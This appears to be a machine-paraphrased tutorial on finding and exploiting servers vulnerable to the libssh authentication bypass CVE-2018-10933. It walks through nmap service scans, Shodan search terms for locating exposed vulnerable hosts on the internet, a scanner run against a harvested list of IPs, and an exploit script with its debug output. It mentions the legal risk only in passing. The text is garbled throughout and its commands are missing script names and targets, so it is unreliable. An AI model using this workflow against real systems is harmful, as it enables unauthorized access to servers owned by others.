To scan and find out all devices on the local network using libssh, open a terminal window and enter the subsequent nmap command.
nmap -sV -p22
Breaking down the command, nmap tells the pc that we would like to really begin using Nmap, whereas -sV tells Nmap that we would like to perform a service scan, that grabs the banner of any service utilized by on an open port. The flag -p22 tells Nmap to only scan devices on port 22, that is the standard port for SSH communication. whereas this won't realize devices that use SSH on a different port, it'll dramatically reduce search times.
Finally, the target expressed as a subnet range; the primary three bytes of this may be unique to your search. once scanning a range of computers instead of only one, the 0/24 at the end is essential for looking the complete subnet. If you would like to find your subnet range, you'll use a tool like “ipcalc” which can calculate it for you. To do so, find your IP address from typewriting ifconfig , then type ipcalc yourIP (replace “yourIP” along with your IP address).
The command will come back a list of devices connected to the subnet, also as some info gathered from the scanned port. in this case we tend to ar trying to find any targets that ar using a version of libssh earlier than 0.7.6. you'll expect to see AN output like below
Nmap scan report for
Host is up (0.0098s latency).

22/tcp closed ssh

Nmap scan report for
Host is up (0.21s latency).

22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for
Host is up (0.079s latency).

22/tcp closed ssh

Nmap scan report for
Host is up (0.024s latency).

22/tcp filtered ssh

The vast majority of vulnerable servers are accessible via a remote network, thus we'll need to search during a different way to find devices not connected directly to our LAN.
To find a remote target, you'll need to make the most of a service known as Shodan 4, a look engine that may find any device connected to internet — unlike Google that only returns results from web servers on port 80. as an example, instead of directing you to a web site attempting to sell you security cameras, Shodan will direct you to the login page of functioning IP cameras, potentially granting you access to the camera given the default password is unchanged.
Shodan can have indexed several vulnerable SSH servers, that we will search for each by port number and different keyword searches that reveal hosts running versions of libssh before 0.7.6 that we know to be affected by the vulnerability.
To start, register for a free account, that allows you to look at the primary two pages of any search question, or about 20 unique devices. Then, to find servers vulnerable to the libssh exploit, you’ll need three terms within the search:
  • port:22 , that is that the default port for the SSH protocol. even if SSH may be moved  to any unused port, this isn’t too common because all it really will is forestall the server from being found with an easy scan for port 22.
  • LibSSH , that returns any server that advertises using the libssh library, indicating that they're potentially exploitable.
  • 0.7.* , that limits the results of the search to devices that ar using versions of libssh that begin with “0.7.” and excludes a lot of up-to-date versions from the results. while you'll still get some results that ar patched, you’ll eliminate most of the a lot of updated devices with this filter.
The search above can come back a list of IP addresses that may be vulnerable to this attack, along side some a lot of info that Shodan was able to retrieve. Shodan’s info will include a banner pull, the location of the device, the latest activity, and also the organization in control of the server.

nce you've got gathered a listing of targets liable to the exploit, either local or remote, you'll use “libssh-scanner” to scan target IP addresses and determine if they’re still possible vulnerable. other tools will go even more to try establishing a shell, however it's important to note that accessing another device using SSH while not permission may violate the pc Fraud and Abuse Act. depending on who owns the device you access, this will land you in serious legal trouble.
In addition to legal issues, you should be wary of connecting to devices from your real IP address that might be purposely vulnerable to this exploit. Honeypots ar often created this way to attract amateur hackers, and you'll end up within a device configured as a trap.
Now, use libssh-scanner to see if the targets gathered in steps 2 and 3 can really be vulnerable to the exploit. To do this, create a TXT file containing all of The Ip addresses found in steps 2 and 3, with each IP address separated by new lines. Name this text file “ips1.txt” and place it within a similar folder as libssh-scanner was downloaded to earlier in step 1.
Once within the directory, enter the following command into a terminal window.
python --port 22 --aggressive ips1.txt
The command can run Python 2.7, scan every IP address within the text file, and determine if the target is really vulnerable to the CVE-2018-10933 security flaw. As you'll see below, performing the scan  narrowed down the list of potential targets from Shodan to only one —
python --aggressive --port 22 ips1.txt libssh scanner 1.0.4 Searching for Vulnerable Hosts... * is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')! is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
Scanner Completed with success
To check the one result, use libSSH-Authentication-Bypass to check the attack.
 change directory into the folder you downloaded libSSH-Authentication-Bypass to 
previously in step 1, 
and enter the subsequent command, work “” with the IP address 
you would like to scan.
python3 --host
The command returns the subsequent output on a server that has been partially patched however 
continues to be vulnerable to the authentication bypass.
python3 --host
DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', ''] server compress:['none', 'zlib', ''] client lang:[''] server lang:[''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: 
If you see a message indicating the connection is successful , then you’ve confirmed the vulnerability on the device
you’re testing. If the connection fails, otherwise you see a part successful result like higher than, then you’ve
confirmed that the difficulty doesn't affect the target (even tho' it should need to be updated anyway if you get a
partial success)